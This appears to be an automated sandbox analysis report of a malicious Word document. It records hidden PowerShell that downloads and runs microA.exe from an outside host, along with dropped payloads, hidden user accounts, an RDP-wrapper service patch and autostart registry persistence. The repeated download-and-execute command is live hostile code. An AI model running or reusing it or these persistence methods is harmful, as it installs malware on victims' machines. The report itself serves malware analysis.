Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/microA.exe','C:\Users\user\AppData\Roaming\microA.exe');Start-Process 'C:\Users\user\AppData\Roaming\microA.exe''
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/microA.exe','C:\Users\user\AppData\Roaming\microA.exe');Start-Process 'C:\Users\user\AppData\Roaming\microA.exe''
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/microA.exe','C:\Users\user\AppData\Roaming\microA.exe');Start-Process 'C:\Users\user\AppData\Roaming\microA.exe''
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_004060B0 LoadLibraryA,GetProcAddress,ExitProcess, 16_2_004060B0
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 10_2_00405C1F pushad ; retf 0029h 10_2_00405C20
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 10_2_004081F4 push ss; retf 10_2_004081F7
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 10_2_00407D9F push eax; iretd 10_2_00407DBD
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 10_2_004082B1 pushad ; retf 0029h 10_2_004082B2
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 10_2_01E26920 push esp; retf 10_2_01E2692D
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 10_2_01E270C0 pushad ; retf 10_2_01E270CD
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 10_2_04E675DB push E807B45Eh; ret 10_2_04E675E1
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 10_2_04E63720 push 8B000001h; iretd 10_2_04E63725
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 10_2_04E61B5A push dword ptr [eax-42000000h]; retf 10_2_04E61B7F
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 11_2_00235C1F pushad ; retf 001Dh 11_2_00235C20
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 11_2_00237D9F push eax; iretd 11_2_00237DBD
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 11_2_002381F4 push ss; retf 11_2_002381F7
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 11_2_002382B1 pushad ; retf 001Dh 11_2_002382B2
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 11_2_00503455 push FFFFFFFCh; retf 11_2_0050345C
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 11_2_01FE1B5A push dword ptr [eax-42000000h]; retf 11_2_01FE1B7F
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 11_2_01FE3720 push 8B000001h; iretd 11_2_01FE3725
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 12_2_00265C1F pushad ; retf 001Ch 12_2_00265C20
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 12_2_00267D9F push eax; iretd 12_2_00267DBD
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 12_2_002681F4 push ss; retf 12_2_002681F7
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 12_2_002682B1 pushad ; retf 001Ch 12_2_002682B2
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 12_2_045B3720 push 8B000001h; iretd 12_2_045B3725
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 12_2_045B1B5A push dword ptr [eax-42000000h]; retf 12_2_045B1B7F
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_004011C0 push eax; ret 16_2_004011D4
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_004011C0 push eax; ret 16_2_004011FC
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_0041C225 pushad ; retn 0041h 16_2_0041C22D
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_004174D1 push ebp; retf 16_2_00417584
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_00417570 push ebp; retf 16_2_00417584
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 17_2_004011C0 push eax; ret 17_2_004011D4
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 17_2_004011C0 push eax; ret 17_2_004011FC
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 17_2_0041C225 pushad ; retn 0041h 17_2_0041C22D
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 17_2_004174D1 push ebp; retf 17_2_00417584

Persistence and Installation Behavior:

Tries to download and execute files (via powershell)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/microA.exe','C:\Users\user\AppData\Roaming\microA.exe');Start-Process 'C:\Users\user\AppData\Roaming\microA.exe''
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/microA.exe','C:\Users\user\AppData\Roaming\microA.exe');Start-Process 'C:\Users\user\AppData\Roaming\microA.exe''
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/microA.exe','C:\Users\user\AppData\Roaming\microA.exe');Start-Process 'C:\Users\user\AppData\Roaming\microA.exe''
Contains functionality to create new users
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_0040D2B8 NetUserAdd,NetLocalGroupAddMembers, 16_2_0040D2B8
Contains functionality to download and launch executables
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_0040290E URLDownloadToFileW,ShellExecuteW, 16_2_0040290E
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\microA.exe File created: C:\ProgramData\images.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\microA.exe
Source: C:\Users\user\AppData\Roaming\microA.exe File created: C:\Users\user\AppData\Local\Temp\microA.exe
Source: C:\Users\user\AppData\Local\Temp\images.exe File created: C:\Program Files\Microsoft DN1\sqlmap.dll
Source: C:\Users\user\AppData\Local\Temp\images.exe File created: C:\Windows\System32\rfxvmt.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\microA[1].exe
Source: C:\Users\user\AppData\Local\Temp\images.exe File created: C:\Users\user\AppData\Roaming\JhwfHBtD..exe
Source: C:\Users\user\AppData\Local\Temp\images.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\microC[1].exe
Source: C:\ProgramData\images.exe File created: C:\Users\user\AppData\Local\Temp\images.exe
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Users\user\AppData\Local\Temp\microA.exe File created: C:\ProgramData\images.exe
Drops PE files to the windows directory (C:\Windows)
Source: C:\Users\user\AppData\Local\Temp\images.exe File created: C:\Windows\System32\rfxvmt.dll
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_0040A36F lstrcatW,GetBinaryTypeW,CopyFileW,PathFileExistsW,GetPrivateProfileStringW, 16_2_0040A36F
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_00409E2D GetBinaryTypeW,CopyFileW,PathFileExistsW,GetPrivateProfileStringW, 16_2_00409E2D
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_00413695 CreateDesktopW,AssocQueryStringW,PathFindFileNameW,CharLowerW,PathFindFileNameW,CharLowerW,SHFileOperationW,CreateDirectoryW,CreateProcessW,CreateProcessW,WaitForSingleObject,CreateProcessW,CreateProcessW,SHFileOperationW,CreateDirectoryW,GetPrivateProfileStringW,CreateProcessW,CreateProcessW,WaitForSingleObject,CreateFileW,WriteFile,CloseHandle,CreateProcessW,GetPrivateProfileStringW,CreateFileW,WriteFile,CloseHandle,CreateProcessW,CreateProcessW,CreateProcessW, 16_2_00413695
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 17_2_0040A36F lstrcatW,GetBinaryTypeW,CopyFileW,PathFileExistsW,GetPrivateProfileStringW, 17_2_0040A36F
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 17_2_00409E2D GetBinaryTypeW,CopyFileW,PathFileExistsW,GetPrivateProfileStringW, 17_2_00409E2D
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 17_2_00413695 CreateDesktopW,AssocQueryStringW,PathFindFileNameW,CharLowerW,PathFindFileNameW,CharLowerW,SHFileOperationW,CreateDirectoryW,CreateProcessW,CreateProcessW,WaitForSingleObject,CreateProcessW,CreateProcessW,SHFileOperationW,CreateDirectoryW,GetPrivateProfileStringW,CreateProcessW,CreateProcessW,WaitForSingleObject,CreateFileW,WriteFile,CloseHandle,CreateProcessW,GetPrivateProfileStringW,CreateFileW,WriteFile,CloseHandle,CreateProcessW,CreateProcessW,CreateProcessW, 17_2_00413695
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 18_2_0040A36F lstrcatW,GetBinaryTypeW,CopyFileW,PathFileExistsW,GetPrivateProfileStringW, 18_2_0040A36F
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 18_2_00409E2D GetBinaryTypeW,CopyFileW,PathFileExistsW,GetPrivateProfileStringW, 18_2_00409E2D
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 18_2_00413695 CreateDesktopW,AssocQueryStringW,PathFindFileNameW,CharLowerW,PathFindFileNameW,CharLowerW,SHFileOperationW,CreateDirectoryW,CreateProcessW,CreateProcessW,WaitForSingleObject,CreateProcessW,CreateProcessW,SHFileOperationW,CreateDirectoryW,GetPrivateProfileStringW,CreateProcessW,CreateProcessW,WaitForSingleObject,CreateFileW,WriteFile,CloseHandle,CreateProcessW,GetPrivateProfileStringW,CreateFileW,WriteFile,CloseHandle,CreateProcessW,CreateProcessW,CreateProcessW, 18_2_00413695
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_0040A36F lstrcatW,GetBinaryTypeW,CopyFileW,PathFileExistsW,GetPrivateProfileStringW, 25_2_0040A36F
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_00409E2D GetBinaryTypeW,CopyFileW,PathFileExistsW,GetPrivateProfileStringW, 25_2_00409E2D
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_00413695 CreateDesktopW,AssocQueryStringW,PathFindFileNameW,CharLowerW,PathFindFileNameW,CharLowerW,SHFileOperationW,CreateDirectoryW,CreateProcessW,CreateProcessW,WaitForSingleObject,CreateProcessW,CreateProcessW,SHFileOperationW,CreateDirectoryW,GetPrivateProfileStringW,CreateProcessW,CreateProcessW,WaitForSingleObject,CreateFileW,WriteFile,CloseHandle,CreateProcessW,GetPrivateProfileStringW,CreateFileW,WriteFile,CloseHandle,CreateProcessW,CreateProcessW,CreateProcessW, 25_2_00413695

Boot Survival:

Creates an undocumented autostart registry key
Source: C:\Windows\SysWOW64\reg.exe Key value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Load
Modifies existing Windows services
Source: C:\Users\user\AppData\Local\Temp\images.exe Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_0040D3A8 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,GetLastError,Sleep,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle, 16_2_0040D3A8

Hooking and other Techniques for Hiding and Protection:

Contains functionality to hide user accounts
Source: microA.exe, 0000000A.00000002.2168254324.0000000001FFB000.00000004.00000001.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: microA.exe, 0000000A.00000002.2168254324.0000000001FFB000.00000004.00000001.sdmp String found in binary or memory: 0.rudp\ICACLS.exe\xcopy.exe "" /GRANT:r *S-1-1-0:(OI)(CI)F /T\AppData\Local\Google\AppData\Local\Google\xcopy.exe /Y /E /C \AppData\Roaming\Mozilla\AppData\Roaming\Mozilla\\AppData\Roaming\Microsoft\AppData\Roaming\Microsoft\\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameTypemultirdp[experimental] patch Terminal Server service to allow multiples userstermsrv.dllexplorer.exeTASKmgr.exeProcessHacker.exeregedit.exentdll.dllLdrGetProcedureAddressRtlNtStatusToDosErrorRtlSetLastWin32ErrorNtAllocateVirtualMemoryNtProtectVirtualMemoryNtWriteVirtualMemoryLdrLoadDllRtlCreateUserThread
Source: microA.exe, 0000000B.00000002.2168345200.0000000002266000.00000004.00000001.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: microA.exe, 0000000B.00000002.2168345200.0000000002266000.00000004.00000001.sdmp String found in binary or memory: 0.rudp\ICACLS.exe\xcopy.exe "" /GRANT:r *S-1-1-0:(OI)(CI)F /T\AppData\Local\Google\AppData\Local\Google\xcopy.exe /Y /E /C \AppData\Roaming\Mozilla\AppData\Roaming\Mozilla\\AppData\Roaming\Microsoft\AppData\Roaming\Microsoft\\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameTypemultirdp[experimental] patch Terminal Server service to allow multiples userstermsrv.dllexplorer.exeTASKmgr.exeProcessHacker.exeregedit.exentdll.dllLdrGetProcedureAddressRtlNtStatusToDosErrorRtlSetLastWin32ErrorNtAllocateVirtualMemoryNtProtectVirtualMemoryNtWriteVirtualMemoryLdrLoadDllRtlCreateUserThread
Source: microA.exe String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: images.exe String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Users\user\AppData\Local\Temp\microA.exe File opened: C:\ProgramData\images.exe:Zone.Identifier read attributes | delete
Hides user accounts
Source: C:\Users\user\AppData\Local\Temp\images.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList cIqnzxr
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BBC2BB GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryW, 25_2_03BBC2BB
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microA.exe Process information set: NOOPENFILEERRORBOX
